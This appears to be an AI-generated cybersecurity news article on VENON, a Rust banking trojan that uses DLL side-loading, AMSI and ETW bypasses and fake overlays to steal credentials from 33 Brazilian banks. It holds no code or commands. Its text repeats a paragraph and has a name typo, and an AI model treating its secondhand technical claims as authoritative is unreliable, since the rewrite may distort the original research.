Ethical Hacking News
Rust-Based VENON Malware Targets 33 Brazilian Banks with Credential-Stealing Overlays
VENON is a Rust-based malware targeting financial institutions in Brazil, with capabilities similar to established banking trojans.The malware uses generative AI to rewrite and expand its functionalities, suggesting access to cutting-edge tools and technologies.VENON exhibits sophisticated infection chain and evasion techniques, including DLL side-loading, anti-sandbox checks, and WebSocket connections.The malware can be controlled remotely by an operator, allowing for uninstallation of modifications and covering up tracks.VENON has been detected targeting 33 financial institutions and digital asset platforms in Brazil, with the ability to steal credentials using fake overlays.
The cybersecurity landscape continues to evolve at a rapid pace, with threat actors continually finding new and innovative ways to compromise vulnerable systems. In recent times, the Latin American cybercrime ecosystem has seen its fair share of attention, particularly when it comes to banking malware targeting financial institutions in Brazil. A new addition to this growing list of threats is VENON, a Rust-based malware that has been discovered by Brazilian cybersecurity company ZenoX.
The discovery of VENON marks an interesting development in the world of cybercrime, as the malware's use of Rust programming language sets it apart from other known Delphi-based malware families. While these traditional malware variants have long been associated with Latin American cybercrime groups, VENON appears to be a more sophisticated and modern take on this type of threat.
According to ZenoX, VENON exhibits behaviors that are consistent with established banking trojans targeting the region, such as Grandoreiro, Mekotio, and Coyote. These malware variants share similar characteristics, including features like banking overlay logic, active window monitoring, and a shortcut (LNK) hijacking mechanism. This suggests that VENON may be part of a larger campaign aimed at compromising financial institutions in Brazil.
However, what sets VENON apart from its predecessors is its use of Rust programming language. The code structure presents patterns suggesting a developer familiar with the capabilities of existing Latin American banking trojans, but who used generative AI to rewrite and expand these functionalities in Rust. This implies that the malware author may have gained access to cutting-edge tools and technologies, allowing them to create a more sophisticated and stealthy threat.
VEEN is distributed by means of a sophisticated infection chain that uses DLL side-loading to launch a malicious DLL. The campaign is suspected to leverage social engineering ploys like ClickFix to trick users into downloading a ZIP archive containing the payloads via a PowerShell script. Once the DLL is executed, it performs nine evasion techniques, including anti-sandbox checks, indirect syscalls, ETW bypass, AMSI bypass, before actually initiating any malicious actions.
The malware also reaches out to a Google Cloud Storage URL to retrieve a configuration, install a scheduled task, and establish a WebSocket connection to the command-and-control (C2) server. Furthermore, two Visual Basic Script blocks are extracted from the DLL that implement a shortcut hijacking mechanism exclusively targeting the Itaú banking application.
The attack also supports an uninstall step to undo the modifications, suggesting that the operation can be remotely controlled by the operator to restore the shortcuts to what they originally were to cover up the tracks. This level of sophistication and control suggests that VENON may be part of a larger, more organized campaign aimed at compromising financial institutions in Brazil.
In all, VENON is equipped to target 33 financial institutions and digital asset platforms by monitoring the window title and active browser domain, springing into action only when any of the targeted applications or websites are opened to facilitate credential theft by serving fake overlays. The attack also supports an uninstall step to undo the modifications, suggesting that the operation can be remotely controlled by the operator to restore the shortcuts to what they originally were to cover up the tracks.
The discovery of VENON marks a significant development in the world of cybercrime, as it highlights the growing sophistication and creativity of threat actors in their attempts to compromise vulnerable systems. As cybersecurity measures continue to evolve, it is essential for individuals and organizations to stay vigilant and adapt to these changing threats.
Summary:
The Rust-based malware VENON has been discovered by Brazilian cybersecurity company ZenoX, targeting 33 financial institutions and digital asset platforms in Brazil with credential-stealing overlays. The malware's use of Rust programming language sets it apart from other known Delphi-based malware families, and its sophisticated infection chain and evasion techniques suggest a high level of sophistication and control. As the threat landscape continues to evolve, it is essential for individuals and organizations to stay vigilant and adapt to these changing threats.
Rust-Based VENON Malware Targets 33 Brazilian Banks with Credential-Stealing Overlays
Related Information:
https://www.ethicalhackingnews.com/articles/Rust-Based-VENON-Malware-Targets-33-Brazilian-Banks-with-Credential-Stealing-Overlays-ehn.shtml
Published: Thu Mar 12 15:14:30 2026 by llama3.2 3B Q4_K_M
